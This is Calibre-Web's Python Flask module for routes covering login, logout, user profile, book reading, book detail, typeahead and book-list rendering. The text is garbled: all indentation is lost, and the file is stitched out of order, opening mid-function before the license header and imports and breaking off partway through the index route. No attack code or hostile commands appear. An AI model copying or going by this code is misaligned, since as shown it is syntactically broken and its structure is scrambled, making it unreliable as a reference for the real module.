flash(_(u"An unknown error occurred. Please try again later."), category="error")
else:
flash(_(u"Please enter valid username to reset password"), category="error")
log.warning('Username missing for password reset IP-address: %s', ip_Address)
else:
if user and check_password_hash(str(user.password), form['password']) and user.name != "Guest":
login_user(user, remember=bool(form.get('remember_me')))
ub.store_user_session()
log.debug(u"You are now logged in as: '%s'", user.name)
flash(_(u"You are now logged in as: '%(nickname)s'", nickname=user.name), category="success")
config.config_is_initial = False
return redirect_back(url_for("web.index"))
else:
log.warning('Login failed for user "%s" IP-address: %s', form['username'], ip_Address)
flash(_(u"Wrong Username or Password"), category="error")
next_url = request.args.get('next', default=url_for("web.index"), type=str)
if url_for("web.logout") == next_url:
next_url = url_for("web.index")
return render_title_template('login.html',
title=_(u"Login"),
next_url=next_url,
config=config,
oauth_check=oauth_check,
mail=config.get_mail_server_configured(), page="login")
@web.route('/logout')
@login_required
def logout():
if current_user is not None and current_user.is_authenticated:
ub.delete_user_session(current_user.id, flask_session.get('_id',""))
logout_user()
if feature_support['oauth'] and (config.config_login_type == 2 or config.config_login_type == 3):
logout_oauth_user()
log.debug(u"User logged out")
return redirect(url_for('web.login'))
# ################################### Users own configuration #########################################################
def change_profile(kobo_support, local_oauth_check, oauth_status, translations, languages):
to_save = request.form.to_dict()
current_user.random_books = 0
if current_user.role_passwd() or current_user.role_admin():
if to_save.get("password"):
current_user.password = generate_password_hash(to_save["password"])
try:
if to_save.get("kindle_mail", current_user.kindle_mail) != current_user.kindle_mail:
current_user.kindle_mail = valid_email(to_save["kindle_mail"])
if to_save.get("email", current_user.email) != current_user.email:
current_user.email = check_email(to_save["email"])
if current_user.role_admin():
if to_save.get("name", current_user.name) != current_user.name:
# Query User name, if not existing, change
current_user.name = check_username(to_save["name"])
current_user.random_books = 1 if to_save.get("show_random") == "on" else 0
if to_save.get("default_language"):
current_user.default_language = to_save["default_language"]
if to_save.get("locale"):
current_user.locale = to_save["locale"]
current_user.kobo_only_shelves_sync = int(to_save.get("kobo_only_shelves_sync") == "on") or 0
except Exception as ex:
flash(str(ex), category="error")
return render_title_template("user_edit.html",
content=current_user,
translations=translations,
profile=1,
languages=languages,
title=_(u"%(name)s's profile", name=current_user.name),
page="me",
kobo_support=kobo_support,
registered_oauth=local_oauth_check,
oauth_status=oauth_status)
val = 0
for key, __ in to_save.items():
if key.startswith('show'):
val += int(key[5:])
current_user.sidebar_view = val
if to_save.get("Show_detail_random"):
current_user.sidebar_view += constants.DETAIL_RANDOM
try:
ub.session.commit()
flash(_(u"Profile updated"), category="success")
log.debug(u"Profile updated")
except IntegrityError:
ub.session.rollback()
flash(_(u"Found an existing account for this e-mail address"), category="error")
log.debug(u"Found an existing account for this e-mail address")
except OperationalError as e:
ub.session.rollback()
log.error("Database error: %s", e)
flash(_(u"Database error: %(error)s.", error=e), category="error")
@web.route("/me", methods=["GET", "POST"])
@login_required
def profile():
languages = calibre_db.speaking_language()
translations = babel.list_translations() + [LC('en')]
kobo_support = feature_support['kobo'] and config.config_kobo_sync
if feature_support['oauth'] and config.config_login_type == 2:
oauth_status = get_oauth_status()
local_oauth_check = oauth_check
else:
oauth_status = None
local_oauth_check = {}
if request.method == "POST":
change_profile(kobo_support, local_oauth_check, oauth_status, translations, languages)
return render_title_template("user_edit.html",
translations=translations,
profile=1,
languages=languages,
content=current_user,
kobo_support=kobo_support,
title=_(u"%(name)s's profile", name=current_user.name),
page="me",
registered_oauth=local_oauth_check,
oauth_status=oauth_status)
# ###################################Show single book ##################################################################
@web.route("/read/<int:book_id>/<book_format>")
@login_required_if_no_ano
@viewer_required
def read_book(book_id, book_format):
book = calibre_db.get_filtered_book(book_id)
if not book:
flash(_(u"Oops! Selected book title is unavailable. File does not exist or is not accessible"), category="error")
log.debug(u"Oops! Selected book title is unavailable. File does not exist or is not accessible")
return redirect(url_for("web.index"))
# check if book has bookmark
bookmark = None
if current_user.is_authenticated:
bookmark = ub.session.query(ub.Bookmark).filter(and_(ub.Bookmark.user_id == int(current_user.id),
ub.Bookmark.book_id == book_id,
ub.Bookmark.format == book_format.upper())).first()
if book_format.lower() == "epub":
log.debug(u"Start epub reader for %d", book_id)
return render_title_template('read.html', bookid=book_id, title=book.title, bookmark=bookmark)
elif book_format.lower() == "pdf":
log.debug(u"Start pdf reader for %d", book_id)
return render_title_template('readpdf.html', pdffile=book_id, title=book.title)
elif book_format.lower() == "txt":
log.debug(u"Start txt reader for %d", book_id)
return render_title_template('readtxt.html', txtfile=book_id, title=book.title)
elif book_format.lower() == "djvu":
log.debug(u"Start djvu reader for %d", book_id)
return render_title_template('readdjvu.html', djvufile=book_id, title=book.title)
else:
for fileExt in constants.EXTENSIONS_AUDIO:
if book_format.lower() == fileExt:
entries = calibre_db.get_filtered_book(book_id)
log.debug(u"Start mp3 listening for %d", book_id)
return render_title_template('listenmp3.html', mp3file=book_id, audioformat=book_format.lower(),
entry=entries, bookmark=bookmark)
for fileExt in ["cbr", "cbt", "cbz"]:
if book_format.lower() == fileExt:
all_name = str(book_id)
title = book.title
if len(book.series):
title = title + " - " + book.series[0].name
if book.series_index:
title = title + " #" + '{0:.2f}'.format(book.series_index).rstrip('0').rstrip('.')
log.debug(u"Start comic reader for %d", book_id)
return render_title_template('readcbr.html', comicfile=all_name, title=title,
extension=fileExt)
log.debug(u"Oops! Selected book title is unavailable. File does not exist or is not accessible")
flash(_(u"Oops! Selected book title is unavailable. File does not exist or is not accessible"), category="error")
return redirect(url_for("web.index"))
@web.route("/book/<int:book_id>")
@login_required_if_no_ano
def show_book(book_id):
entries = calibre_db.get_filtered_book(book_id, allow_show_archived=True)
if entries:
for index in range(0, len(entries.languages)):
entries.languages[index].language_name = isoLanguages.get_language_name(get_locale(), entries.languages[
index].lang_code)
#try:
# entries.languages[index].language_name = isoLanguages.get_language_name(get_locale(), LC.parse(entries.languages[index].lang_code)
# .get_language_name(get_locale())
#except UnknownLocaleError:
# entries.languages[index].language_name = _(
# isoLanguages.get(part3=entries.languages[index].lang_code).name)
cc = get_cc_columns(filter_config_custom_read=True)
book_in_shelfs = []
shelfs = ub.session.query(ub.BookShelf).filter(ub.BookShelf.book_id == book_id).all()
for entry in shelfs:
book_in_shelfs.append(entry.shelf)
if not current_user.is_anonymous:
if not config.config_read_column:
matching_have_read_book = ub.session.query(ub.ReadBook). \
filter(and_(ub.ReadBook.user_id == int(current_user.id), ub.ReadBook.book_id == book_id)).all()
have_read = len(
matching_have_read_book) > 0 and matching_have_read_book[0].read_status == ub.ReadBook.STATUS_FINISHED
else:
try:
matching_have_read_book = getattr(entries, 'custom_column_' + str(config.config_read_column))
have_read = len(matching_have_read_book) > 0 and matching_have_read_book[0].value
except (KeyError, AttributeError):
log.error("Custom Column No.%d is not existing in calibre database", config.config_read_column)
have_read = None
archived_book = ub.session.query(ub.ArchivedBook).\
filter(and_(ub.ArchivedBook.user_id == int(current_user.id),
ub.ArchivedBook.book_id == book_id)).first()
is_archived = archived_book and archived_book.is_archived
else:
have_read = None
is_archived = None
entries.tags = sort(entries.tags, key=lambda tag: tag.name)
entries = calibre_db.order_authors(entries)
kindle_list = check_send_to_kindle(entries)
reader_list = check_read_formats(entries)
audioentries = []
for media_format in entries.data:
if media_format.format.lower() in constants.EXTENSIONS_AUDIO:
audioentries.append(media_format.format.lower())
return render_title_template('detail.html',
entry=entries,
audioentries=audioentries,
cc=cc,
is_xhr=request.headers.get('X-Requested-With')=='XMLHttpRequest',
title=entries.title,
books_shelfs=book_in_shelfs,
have_read=have_read,
is_archived=is_archived,
kindle_list=kindle_list,
reader_list=reader_list,
page="book")
else:
log.debug(u"Oops! Selected book title is unavailable. File does not exist or is not accessible")
flash(_(u"Oops! Selected book title is unavailable. File does not exist or is not accessible"),
category="error")
return redirect(url_for("web.index"))
| # -*- coding: utf-8 -*-
# This file is part of the Calibre-Web (https://github.com/janeczku/calibre-web)
# Copyright (C) 2018-2019 OzzieIsaacs, cervinko, jkrehm, bodybybuddha, ok11,
# andy29485, idalin, Kyosfonica, wuqi, Kennyl, lemmsh,
# falgh1, grunjol, csitko, ytils, xybydy, trasba, vrabe,
# ruben-herold, marblepebble, JackED42, SiphonSquirrel,
# apetresc, nanu-c, mutschler
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from __future__ import division, print_function, unicode_literals
import os
from datetime import datetime
import json
import mimetypes
import chardet # dependency of requests
import copy
from babel.dates import format_date
from babel import Locale as LC
from babel.core import UnknownLocaleError
from flask import Blueprint, jsonify
from flask import request, redirect, send_from_directory, make_response, flash, abort, url_for
from flask import session as flask_session
from flask_babel import gettext as _
from flask_login import login_user, logout_user, login_required, current_user
from sqlalchemy.exc import IntegrityError, InvalidRequestError, OperationalError
from sqlalchemy.sql.expression import text, func, false, not_, and_, or_
from sqlalchemy.orm.attributes import flag_modified
from sqlalchemy.sql.functions import coalesce
from .services.worker import WorkerThread
from werkzeug.datastructures import Headers
from werkzeug.security import generate_password_hash, check_password_hash
from . import constants, logger, isoLanguages, services
from . import babel, db, ub, config, get_locale, app
from . import calibre_db
from .gdriveutils import getFileFromEbooksFolder, do_gdrive_download
from .helper import check_valid_domain, render_task_status, check_email, check_username, \
get_cc_columns, get_book_cover, get_download_link, send_mail, generate_random_password, \
send_registration_mail, check_send_to_kindle, check_read_formats, tags_filters, reset_password, valid_email
from .pagination import Pagination
from .redirect import redirect_back
from .usermanagement import login_required_if_no_ano
from .render_template import render_title_template
feature_support = {
'ldap': bool(services.ldap),
'goodreads': bool(services.goodreads_support),
'kobo': bool(services.kobo)
}
try:
from .oauth_bb import oauth_check, register_user_with_oauth, logout_oauth_user, get_oauth_status
feature_support['oauth'] = True
except ImportError:
feature_support['oauth'] = False
oauth_check = {}
try:
from functools import wraps
except ImportError:
pass # We're not using Python 3
try:
from natsort import natsorted as sort
except ImportError:
sort = sorted # Just use regular sort then, may cause issues with badly named pages in cbz/cbr files
@app.after_request
def add_security_headers(resp):
resp.headers['Content-Security-Policy'] = "default-src 'self' 'unsafe-inline' 'unsafe-eval'; img-src 'self' data:"
if request.endpoint == "editbook.edit_book":
resp.headers['Content-Security-Policy'] += " *"
resp.headers['X-Content-Type-Options'] = 'nosniff'
resp.headers['X-Frame-Options'] = 'SAMEORIGIN'
resp.headers['X-XSS-Protection'] = '1; mode=block'
resp.headers['Strict-Transport-Security'] = 'max-age=31536000; includeSubDomains'
return resp
web = Blueprint('web', __name__)
log = logger.create()
# ################################### Login logic and rights management ###############################################
def download_required(f):
@wraps(f)
def inner(*args, **kwargs):
if current_user.role_download():
return f(*args, **kwargs)
abort(403)
return inner
def viewer_required(f):
@wraps(f)
def inner(*args, **kwargs):
if current_user.role_viewer():
return f(*args, **kwargs)
abort(403)
return inner
# ################################### data provider functions #########################################################
@web.route("/ajax/emailstat")
@login_required
def get_email_status_json():
tasks = WorkerThread.getInstance().tasks
return jsonify(render_task_status(tasks))
@web.route("/ajax/bookmark/<int:book_id>/<book_format>", methods=['POST'])
@login_required
def bookmark(book_id, book_format):
bookmark_key = request.form["bookmark"]
ub.session.query(ub.Bookmark).filter(and_(ub.Bookmark.user_id == int(current_user.id),
ub.Bookmark.book_id == book_id,
ub.Bookmark.format == book_format)).delete()
if not bookmark_key:
ub.session_commit()
return "", 204
lbookmark = ub.Bookmark(user_id=current_user.id,
book_id=book_id,
format=book_format,
bookmark_key=bookmark_key)
ub.session.merge(lbookmark)
ub.session_commit("Bookmark for user {} in book {} created".format(current_user.id, book_id))
return "", 201
@web.route("/ajax/toggleread/<int:book_id>", methods=['POST'])
@login_required
def toggle_read(book_id):
if not config.config_read_column:
book = ub.session.query(ub.ReadBook).filter(and_(ub.ReadBook.user_id == int(current_user.id),
ub.ReadBook.book_id == book_id)).first()
if book:
if book.read_status == ub.ReadBook.STATUS_FINISHED:
book.read_status = ub.ReadBook.STATUS_UNREAD
else:
book.read_status = ub.ReadBook.STATUS_FINISHED
else:
readBook = ub.ReadBook(user_id=current_user.id, book_id = book_id)
readBook.read_status = ub.ReadBook.STATUS_FINISHED
book = readBook
if not book.kobo_reading_state:
kobo_reading_state = ub.KoboReadingState(user_id=current_user.id, book_id=book_id)
kobo_reading_state.current_bookmark = ub.KoboBookmark()
kobo_reading_state.statistics = ub.KoboStatistics()
book.kobo_reading_state = kobo_reading_state
ub.session.merge(book)
ub.session_commit("Book {} readbit toggled".format(book_id))
else:
try:
calibre_db.update_title_sort(config)
book = calibre_db.get_filtered_book(book_id)
read_status = getattr(book, 'custom_column_' + str(config.config_read_column))
if len(read_status):
read_status[0].value = not read_status[0].value
calibre_db.session.commit()
else:
cc_class = db.cc_classes[config.config_read_column]
new_cc = cc_class(value=1, book=book_id)
calibre_db.session.add(new_cc)
calibre_db.session.commit()
except (KeyError, AttributeError):
log.error(u"Custom Column No.%d is not existing in calibre database", config.config_read_column)
return "Custom Column No.{} is not existing in calibre database".format(config.config_read_column), 400
except (OperationalError, InvalidRequestError) as e:
calibre_db.session.rollback()
log.error(u"Read status could not set: %e", e)
return "Read status could not set: {}".format(e), 400
return ""
@web.route("/ajax/togglearchived/<int:book_id>", methods=['POST'])
@login_required
def toggle_archived(book_id):
archived_book = ub.session.query(ub.ArchivedBook).filter(and_(ub.ArchivedBook.user_id == int(current_user.id),
ub.ArchivedBook.book_id == book_id)).first()
if archived_book:
archived_book.is_archived = not archived_book.is_archived
archived_book.last_modified = datetime.utcnow()
else:
archived_book = ub.ArchivedBook(user_id=current_user.id, book_id=book_id)
archived_book.is_archived = True
ub.session.merge(archived_book)
ub.session_commit("Book {} archivebit toggled".format(book_id))
return ""
@web.route("/ajax/view", methods=["POST"])
@login_required_if_no_ano
def update_view():
to_save = request.get_json()
try:
for element in to_save:
for param in to_save[element]:
current_user.set_view_property(element, param, to_save[element][param])
except Exception as ex:
log.error("Could not save view_settings: %r %r: %e", request, to_save, ex)
return "Invalid request", 400
return "1", 200
'''
@web.route("/ajax/getcomic/<int:book_id>/<book_format>/<int:page>")
@login_required
def get_comic_book(book_id, book_format, page):
book = calibre_db.get_book(book_id)
if not book:
return "", 204
else:
for bookformat in book.data:
if bookformat.format.lower() == book_format.lower():
cbr_file = os.path.join(config.config_calibre_dir, book.path, bookformat.name) + "." + book_format
if book_format in ("cbr", "rar"):
if feature_support['rar'] == True:
rarfile.UNRAR_TOOL = config.config_rarfile_location
try:
rf = rarfile.RarFile(cbr_file)
names = sort(rf.namelist())
extract = lambda page: rf.read(names[page])
except:
# rarfile not valid
log.error('Unrar binary not found, or unable to decompress file %s', cbr_file)
return "", 204
else:
log.info('Unrar is not supported please install python rarfile extension')
# no support means return nothing
return "", 204
elif book_format in ("cbz", "zip"):
zf = zipfile.ZipFile(cbr_file)
names=sort(zf.namelist())
extract = lambda page: zf.read(names[page])
elif book_format in ("cbt", "tar"):
tf = tarfile.TarFile(cbr_file)
names=sort(tf.getnames())
extract = lambda page: tf.extractfile(names[page]).read()
else:
log.error('unsupported comic format')
return "", 204
if sys.version_info.major >= 3:
b64 = codecs.encode(extract(page), 'base64').decode()
else:
b64 = extract(page).encode('base64')
ext = names[page].rpartition('.')[-1]
if ext not in ('png', 'gif', 'jpg', 'jpeg', 'webp'):
ext = 'png'
extractedfile="data:image/" + ext + ";base64," + b64
fileData={"name": names[page], "page":page, "last":len(names)-1, "content": extractedfile}
return make_response(json.dumps(fileData))
return "", 204
'''
# ################################### Typeahead ##################################################################
@web.route("/get_authors_json", methods=['GET'])
@login_required_if_no_ano
def get_authors_json():
return calibre_db.get_typeahead(db.Authors, request.args.get('q'), ('|', ','))
@web.route("/get_publishers_json", methods=['GET'])
@login_required_if_no_ano
def get_publishers_json():
return calibre_db.get_typeahead(db.Publishers, request.args.get('q'), ('|', ','))
@web.route("/get_tags_json", methods=['GET'])
@login_required_if_no_ano
def get_tags_json():
return calibre_db.get_typeahead(db.Tags, request.args.get('q'), tag_filter=tags_filters())
@web.route("/get_series_json", methods=['GET'])
@login_required_if_no_ano
def get_series_json():
return calibre_db.get_typeahead(db.Series, request.args.get('q'))
@web.route("/get_languages_json", methods=['GET'])
@login_required_if_no_ano
def get_languages_json():
query = (request.args.get('q') or '').lower()
language_names = isoLanguages.get_language_names(get_locale())
entries_start = [s for key, s in language_names.items() if s.lower().startswith(query.lower())]
if len(entries_start) < 5:
entries = [s for key, s in language_names.items() if query in s.lower()]
entries_start.extend(entries[0:(5 - len(entries_start))])
entries_start = list(set(entries_start))
json_dumps = json.dumps([dict(name=r) for r in entries_start[0:5]])
return json_dumps
@web.route("/get_matching_tags", methods=['GET'])
@login_required_if_no_ano
def get_matching_tags():
tag_dict = {'tags': []}
q = calibre_db.session.query(db.Books).filter(calibre_db.common_filters(True))
calibre_db.session.connection().connection.connection.create_function("lower", 1, db.lcase)
author_input = request.args.get('author_name') or ''
title_input = request.args.get('book_title') or ''
include_tag_inputs = request.args.getlist('include_tag') or ''
exclude_tag_inputs = request.args.getlist('exclude_tag') or ''
q = q.filter(db.Books.authors.any(func.lower(db.Authors.name).ilike("%" + author_input + "%")),
func.lower(db.Books.title).ilike("%" + title_input + "%"))
if len(include_tag_inputs) > 0:
for tag in include_tag_inputs:
q = q.filter(db.Books.tags.any(db.Tags.id == tag))
if len(exclude_tag_inputs) > 0:
for tag in exclude_tag_inputs:
q = q.filter(not_(db.Books.tags.any(db.Tags.id == tag)))
for book in q:
for tag in book.tags:
if tag.id not in tag_dict['tags']:
tag_dict['tags'].append(tag.id)
json_dumps = json.dumps(tag_dict)
return json_dumps
def get_sort_function(sort, data):
order = [db.Books.timestamp.desc()]
if sort == 'stored':
sort = current_user.get_view_property(data, 'stored')
else:
current_user.set_view_property(data, 'stored', sort)
if sort == 'pubnew':
order = [db.Books.pubdate.desc()]
if sort == 'pubold':
order = [db.Books.pubdate]
if sort == 'abc':
order = [db.Books.sort]
if sort == 'zyx':
order = [db.Books.sort.desc()]
if sort == 'new':
order = [db.Books.timestamp.desc()]
if sort == 'old':
order = [db.Books.timestamp]
if sort == 'authaz':
order = [db.Books.author_sort.asc(), db.Series.name, db.Books.series_index]
if sort == 'authza':
order = [db.Books.author_sort.desc(), db.Series.name.desc(), db.Books.series_index.desc()]
if sort == 'seriesasc':
order = [db.Books.series_index.asc()]
if sort == 'seriesdesc':
order = [db.Books.series_index.desc()]
return order
def render_books_list(data, sort, book_id, page):
order = get_sort_function(sort, data)
if data == "rated":
return render_rated_books(page, book_id, order=order)
elif data == "discover":
return render_discover_books(page, book_id)
elif data == "unread":
return render_read_books(page, False, order=order)
elif data == "read":
return render_read_books(page, True, order=order)
elif data == "hot":
return render_hot_books(page)
elif data == "download":
return render_downloaded_books(page, order, book_id)
elif data == "author":
return render_author_books(page, book_id, order)
elif data == "publisher":
return render_publisher_books(page, book_id, order)
elif data == "series":
return render_series_books(page, book_id, order)
elif data == "ratings":
return render_ratings_books(page, book_id, order)
elif data == "formats":
return render_formats_books(page, book_id, order)
elif data == "category":
return render_category_books(page, book_id, order)
elif data == "language":
return render_language_books(page, book_id, order)
elif data == "archived":
return render_archived_books(page, order)
elif data == "search":
term = (request.args.get('query') or '')
offset = int(int(config.config_books_per_page) * (page - 1))
return render_search_results(term, offset, order, config.config_books_per_page)
elif data == "advsearch":
term = json.loads(flask_session['query'])
offset = int(int(config.config_books_per_page) * (page - 1))
return render_adv_search_results(term, offset, order, config.config_books_per_page)
else:
website = data or "newest"
entries, random, pagination = calibre_db.fill_indexpage(page, 0, db.Books, True, order,
db.books_series_link,
db.Books.id == db.books_series_link.c.book,
db.Series)
return render_title_template('index.html', random=random, entries=entries, pagination=pagination,
title=_(u"Books"), page=website)
def render_rated_books(page, book_id, order):
if current_user.check_visibility(constants.SIDEBAR_BEST_RATED):
entries, random, pagination = calibre_db.fill_indexpage(page, 0,
db.Books,
db.Books.ratings.any(db.Ratings.rating > 9),
order,
db.books_series_link,
db.Books.id == db.books_series_link.c.book,
db.Series)
return render_title_template('index.html', random=random, entries=entries, pagination=pagination,
id=book_id, title=_(u"Top Rated Books"), page="rated")
else:
abort(404)
def render_discover_books(page, book_id):
if current_user.check_visibility(constants.SIDEBAR_RANDOM):
entries, __, pagination = calibre_db.fill_indexpage(page, 0, db.Books, True, [func.randomblob(2)])
pagination = Pagination(1, config.config_books_per_page, config.config_books_per_page)
return render_title_template('discover.html', entries=entries, pagination=pagination, id=book_id,
title=_(u"Discover (Random Books)"), page="discover")
else:
abort(404)
def render_hot_books(page):
if current_user.check_visibility(constants.SIDEBAR_HOT):
if current_user.show_detail_random():
random = calibre_db.session.query(db.Books).filter(calibre_db.common_filters()) \
.order_by(func.random()).limit(config.config_random_books)
else:
random = false()
off = int(int(config.config_books_per_page) * (page - 1))
all_books = ub.session.query(ub.Downloads, func.count(ub.Downloads.book_id)).order_by(
func.count(ub.Downloads.book_id).desc()).group_by(ub.Downloads.book_id)
hot_books = all_books.offset(off).limit(config.config_books_per_page)
entries = list()
for book in hot_books:
downloadBook = calibre_db.session.query(db.Books).filter(calibre_db.common_filters()).filter(
db.Books.id == book.Downloads.book_id).first()
if downloadBook:
entries.append(downloadBook)
else:
ub.delete_download(book.Downloads.book_id)
numBooks = entries.__len__()
pagination = Pagination(page, config.config_books_per_page, numBooks)
return render_title_template('index.html', random=random, entries=entries, pagination=pagination,
title=_(u"Hot Books (Most Downloaded)"), page="hot")
else:
abort(404)
def render_downloaded_books(page, order, user_id):
if current_user.role_admin():
user_id = int(user_id)
else:
user_id = current_user.id
if current_user.check_visibility(constants.SIDEBAR_DOWNLOAD):
if current_user.show_detail_random():
random = calibre_db.session.query(db.Books).filter(calibre_db.common_filters()) \
.order_by(func.random()).limit(config.config_random_books)
else:
random = false()
entries, __, pagination = calibre_db.fill_indexpage(page,
0,
db.Books,
ub.Downloads.user_id == user_id,
order,
ub.Downloads, db.Books.id == ub.Downloads.book_id)
for book in entries:
if not calibre_db.session.query(db.Books).filter(calibre_db.common_filters()) \
.filter(db.Books.id == book.id).first():
ub.delete_download(book.id)
user = ub.session.query(ub.User).filter(ub.User.id == user_id).first()
return render_title_template('index.html',
random=random,
entries=entries,
pagination=pagination,
id=user_id,
title=_(u"Downloaded books by %(user)s",user=user.name),
page="download")
else:
abort(404)
def render_author_books(page, author_id, order):
entries, __, pagination = calibre_db.fill_indexpage(page, 0,
db.Books,
db.Books.authors.any(db.Authors.id == author_id),
[order[0], db.Series.name, db.Books.series_index],
db.books_series_link,
db.Books.id == db.books_series_link.c.book,
db.Series)
if entries is None or not len(entries):
flash(_(u"Oops! Selected book title is unavailable. File does not exist or is not accessible"),
category="error")
return redirect(url_for("web.index"))
if constants.sqlalchemy_version2:
author = calibre_db.session.get(db.Authors, author_id)
else:
author = calibre_db.session.query(db.Authors).get(author_id)
author_name = author.name.replace('|', ',')
author_info = None
other_books = []
if services.goodreads_support and config.config_use_goodreads:
author_info = services.goodreads_support.get_author_info(author_name)
other_books = services.goodreads_support.get_other_books(author_info, entries)
return render_title_template('author.html', entries=entries, pagination=pagination, id=author_id,
title=_(u"Author: %(name)s", name=author_name), author=author_info,
other_books=other_books, page="author")
def render_publisher_books(page, book_id, order):
publisher = calibre_db.session.query(db.Publishers).filter(db.Publishers.id == book_id).first()
if publisher:
entries, random, pagination = calibre_db.fill_indexpage(page, 0,
db.Books,
db.Books.publishers.any(db.Publishers.id == book_id),
[db.Series.name, order[0], db.Books.series_index],
db.books_series_link,
db.Books.id == db.books_series_link.c.book,
db.Series)
return render_title_template('index.html', random=random, entries=entries, pagination=pagination, id=book_id,
title=_(u"Publisher: %(name)s", name=publisher.name), page="publisher")
else:
abort(404)
def render_series_books(page, book_id, order):
name = calibre_db.session.query(db.Series).filter(db.Series.id == book_id).first()
if name:
entries, random, pagination = calibre_db.fill_indexpage(page, 0,
db.Books,
db.Books.series.any(db.Series.id == book_id),
[order[0]])
return render_title_template('index.html', random=random, pagination=pagination, entries=entries, id=book_id,
title=_(u"Series: %(serie)s", serie=name.name), page="series")
else:
abort(404)
def render_ratings_books(page, book_id, order):
name = calibre_db.session.query(db.Ratings).filter(db.Ratings.id == book_id).first()
entries, random, pagination = calibre_db.fill_indexpage(page, 0,
db.Books,
db.Books.ratings.any(db.Ratings.id == book_id),
[order[0]])
if name and name.rating <= 10:
return render_title_template('index.html', random=random, pagination=pagination, entries=entries, id=book_id,
title=_(u"Rating: %(rating)s stars", rating=int(name.rating / 2)), page="ratings")
else:
abort(404)
def render_formats_books(page, book_id, order):
name = calibre_db.session.query(db.Data).filter(db.Data.format == book_id.upper()).first()
if name:
entries, random, pagination = calibre_db.fill_indexpage(page, 0,
db.Books,
db.Books.data.any(db.Data.format == book_id.upper()),
[order[0]])
return render_title_template('index.html', random=random, pagination=pagination, entries=entries, id=book_id,
title=_(u"File format: %(format)s", format=name.format), page="formats")
else:
abort(404)
def render_category_books(page, book_id, order):
name = calibre_db.session.query(db.Tags).filter(db.Tags.id == book_id).first()
if name:
entries, random, pagination = calibre_db.fill_indexpage(page, 0,
db.Books,
db.Books.tags.any(db.Tags.id == book_id),
[order[0], db.Series.name, db.Books.series_index],
db.books_series_link,
db.Books.id == db.books_series_link.c.book,
db.Series)
return render_title_template('index.html', random=random, entries=entries, pagination=pagination, id=book_id,
title=_(u"Category: %(name)s", name=name.name), page="category")
else:
abort(404)
def render_language_books(page, name, order):
try:
lang_name = isoLanguages.get_language_name(get_locale(), name)
except KeyError:
abort(404)
#try:
# cur_l = LC.parse(name)
# lang_name = cur_l.get_language_name(get_locale())
#except UnknownLocaleError:
# try:
# lang_name = _(isoLanguages.get(part3=name).name)
# except KeyError:
# abort(404)
entries, random, pagination = calibre_db.fill_indexpage(page, 0,
db.Books,
db.Books.languages.any(db.Languages.lang_code == name),
[order[0]])
return render_title_template('index.html', random=random, entries=entries, pagination=pagination, id=name,
title=_(u"Language: %(name)s", name=lang_name), page="language")
def render_read_books(page, are_read, as_xml=False, order=None):
order = order or []
if not config.config_read_column:
if are_read:
db_filter = and_(ub.ReadBook.user_id == int(current_user.id),
ub.ReadBook.read_status == ub.ReadBook.STATUS_FINISHED)
else:
db_filter = coalesce(ub.ReadBook.read_status, 0) != ub.ReadBook.STATUS_FINISHED
entries, random, pagination = calibre_db.fill_indexpage(page, 0,
db.Books,
db_filter,
order,
db.books_series_link,
db.Books.id == db.books_series_link.c.book,
db.Series,
ub.ReadBook, db.Books.id == ub.ReadBook.book_id)
else:
try:
if are_read:
db_filter = db.cc_classes[config.config_read_column].value == True
else:
db_filter = coalesce(db.cc_classes[config.config_read_column].value, False) != True
entries, random, pagination = calibre_db.fill_indexpage(page, 0,
db.Books,
db_filter,
order,
db.books_series_link,
db.Books.id == db.books_series_link.c.book,
db.Series,
db.cc_classes[config.config_read_column])
except (KeyError, AttributeError):
log.error("Custom Column No.%d is not existing in calibre database", config.config_read_column)
if not as_xml:
flash(_("Custom Column No.%(column)d is not existing in calibre database",
column=config.config_read_column),
category="error")
return redirect(url_for("web.index"))
# ToDo: Handle error Case for opds
if as_xml:
return entries, pagination
else:
if are_read:
name = _(u'Read Books') + ' (' + str(pagination.total_count) + ')'
pagename = "read"
else:
name = _(u'Unread Books') + ' (' + str(pagination.total_count) + ')'
pagename = "unread"
return render_title_template('index.html', random=random, entries=entries, pagination=pagination,
title=name, page=pagename)
def render_archived_books(page, order):
order = order or []
archived_books = (
ub.session.query(ub.ArchivedBook)
.filter(ub.ArchivedBook.user_id == int(current_user.id))
.filter(ub.ArchivedBook.is_archived == True)
.all()
)
archived_book_ids = [archived_book.book_id for archived_book in archived_books]
archived_filter = db.Books.id.in_(archived_book_ids)
entries, random, pagination = calibre_db.fill_indexpage_with_archived_books(page, 0,
db.Books,
archived_filter,
order,
allow_show_archived=True)
name = _(u'Archived Books') + ' (' + str(len(archived_book_ids)) + ')'
pagename = "archived"
return render_title_template('index.html', random=random, entries=entries, pagination=pagination,
title=name, page=pagename)
def render_prepare_search_form(cc):
# prepare data for search-form
tags = calibre_db.session.query(db.Tags)\
.join(db.books_tags_link)\
.join(db.Books)\
.filter(calibre_db.common_filters()) \
.group_by(text('books_tags_link.tag'))\
.order_by(db.Tags.name).all()
series = calibre_db.session.query(db.Series)\
.join(db.books_series_link)\
.join(db.Books)\
.filter(calibre_db.common_filters()) \
.group_by(text('books_series_link.series'))\
.order_by(db.Series.name)\
.filter(calibre_db.common_filters()).all()
shelves = ub.session.query(ub.Shelf)\
.filter(or_(ub.Shelf.is_public == 1, ub.Shelf.user_id == int(current_user.id)))\
.order_by(ub.Shelf.name).all()
extensions = calibre_db.session.query(db.Data)\
.join(db.Books)\
.filter(calibre_db.common_filters()) \
.group_by(db.Data.format)\
.order_by(db.Data.format).all()
if current_user.filter_language() == u"all":
languages = calibre_db.speaking_language()
else:
languages = None
return render_title_template('search_form.html', tags=tags, languages=languages, extensions=extensions,
series=series,shelves=shelves, title=_(u"Advanced Search"), cc=cc, page="advsearch")
def render_search_results(term, offset=None, order=None, limit=None):
join = db.books_series_link, db.Books.id == db.books_series_link.c.book, db.Series
entries, result_count, pagination = calibre_db.get_search_results(term, offset, order, limit, *join)
return render_title_template('search.html',
searchterm=term,
pagination=pagination,
query=term,
adv_searchterm=term,
entries=entries,
result_count=result_count,
title=_(u"Search"),
page="search")
# ################################### View Books list ##################################################################
@web.route("/", defaults={'page': 1})
@web.route('/page/<int:page>')
@login_required_if_no_ano
def index(page):
sort_param = (request.args.get('sort') or 'stored').lower()
